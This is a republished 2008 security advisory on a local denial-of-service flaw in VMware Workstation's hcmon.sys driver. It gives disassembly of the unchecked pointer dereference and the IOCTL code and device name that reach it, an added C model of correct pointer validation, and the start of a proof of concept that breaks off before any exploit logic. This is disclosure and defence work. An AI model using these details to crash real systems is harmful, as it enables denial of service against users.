VMware Workstation (hcmon.sys 6.0.0.45731) Local DoS Vulnerability
  Add date: 10/07/2008   Publishing date: 10/07/2008   Hits: 32

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- - Orange Bat advisory -

Name             : VMWare Workstation (hcmon.sys 6.0.0.45731)
Class            : DoS
Published       : 2008-08-17
Credit        : g_ (g_ # orange-bat # com)

- - Details -

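hcmon.sys fails to sanitize pointers sent from user mode in a
METHOD_NEITHER IOCTL. With METHOD_NEITHER the I/O manager passes the
caller's buffer address to the driver as-is, so the driver must validate
it before dereferencing.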

hcmon.sys:

.text:00011606 loc_11606:
.text:00011606                 mov     eax, [ebp+SystemBuffer]
.text:00011609                 mov     [ebp+SystemBuffer2], eax
.text:0001160C                 mov     ecx, [ebp+SystemBuffer2]
.text:0001160F                 mov     edx, [ecx+0Ch]       <---- BUGCHECK
.text:00011612                 cmp     edx, [ebp+var_20]
.text:00011615                 jnz     short loc_11629
.text:00011617                 cmp     [ebp+NumberOfBytes], 70h
.text:0001161B                 jb      short loc_11629
.text:0001161D                 mov     eax, [ebp+SystemBuffer2]
.text:00011620                 cmp     dword ptr [eax+8], 7FFBh
.text:00011627                 jbe     short loc_11638

This code can be reached by sending IOCTL 0x8101232B to the \\.\hcmon
device.
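
Added example, not part of the original advisory and not hcmon.sys code: a user-mode C model of the checks the advisory says are missing, in the order a METHOD_NEITHER handler should apply them (length, probe, one guarded capture, then field reads). The names handle_request, capture and user_page, the constructed address 0x00400000, and treating NumberOfBytes as the input length are assumptions.

```c
/* User-mode model (added example) of the checks a METHOD_NEITHER handler
 * needs before touching a caller-supplied pointer. Addresses are 32-bit
 * values as in the x86 listing; nothing here is hcmon.sys code. */
#include <stdint.h>
#include <string.h>

#define STATUS_SUCCESS               0x00000000u
#define STATUS_DATATYPE_MISALIGNMENT 0x80000002u
#define STATUS_ACCESS_VIOLATION      0xC0000005u
#define STATUS_BUFFER_TOO_SMALL      0xC0000023u
#define USER_PROBE_ADDRESS 0x7FFF0000u /* default MmUserProbeAddress, 32-bit x86 */
#define REQ_SIZE  0x70u                /* minimum length compared in the listing */
#define USER_BASE 0x00400000u          /* constructed: the one mapped user page */
static uint8_t user_page[0x1000];

/* Same conditions ProbeForRead raises on: alignment, wrap, kernel range. */
static uint32_t probe_for_read(uint32_t addr, uint32_t len, uint32_t align) {
    if (len == 0) return STATUS_SUCCESS;
    if (addr & (align - 1)) return STATUS_DATATYPE_MISALIGNMENT;
    uint32_t end = addr + len;
    if (end < addr || end > USER_PROBE_ADDRESS) return STATUS_ACCESS_VIOLATION;
    return STATUS_SUCCESS;
}

/* Models the guarded copy: in a driver an unmapped page faults inside
 * __try/__except; here that is a range check against user_page. */
static uint32_t capture(uint8_t *dst, uint32_t addr, uint32_t len) {
    if (addr < USER_BASE || addr - USER_BASE > sizeof user_page - len)
        return STATUS_ACCESS_VIOLATION;
    memcpy(dst, user_page + (addr - USER_BASE), len);
    return STATUS_SUCCESS;
}

/* Hardened order: length, probe, capture once, then read fields. */
uint32_t handle_request(uint32_t user_ptr, uint32_t in_len, uint32_t *field_0c) {
    uint8_t req[REQ_SIZE];               /* kernel-side copy, read only from here */
    uint32_t st;
    if (in_len < REQ_SIZE) return STATUS_BUFFER_TOO_SMALL;
    if ((st = probe_for_read(user_ptr, REQ_SIZE, 4)) != STATUS_SUCCESS) return st;
    if ((st = capture(req, user_ptr, REQ_SIZE)) != STATUS_SUCCESS) return st;
    memcpy(field_0c, req + 0x0C, sizeof *field_0c); /* offset read in the listing */
    return STATUS_SUCCESS;
}

int main(void) {
    uint32_t v;  /* kernel-range pointer must be rejected, not dereferenced */
    return handle_request(0x80001000u, REQ_SIZE, &v) == STATUS_ACCESS_VIOLATION ? 0 : 1;
}
```

A NULL pointer passes the range probe and is only caught by the guarded copy, which is why the probe alone is not enough in a real handler.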

- - Proof of concept -

#include <windows.h>
#include <stdio.h>
#include <ddk/ntifs.h>


void TextError(LPTSTR lpszFunction)
{
   // Retrieve the system error message for the last-error code

   LPVOID lpMsgBuf;
   LPVOID lpDisplayBuf;
   DWORD dw = GetLastError();

   FormatMessage(
       FORMAT_MESSAGE_ALLOCATE_BUFFER |
       FORMAT_MESSAGE_FROM_SYSTEM |

 
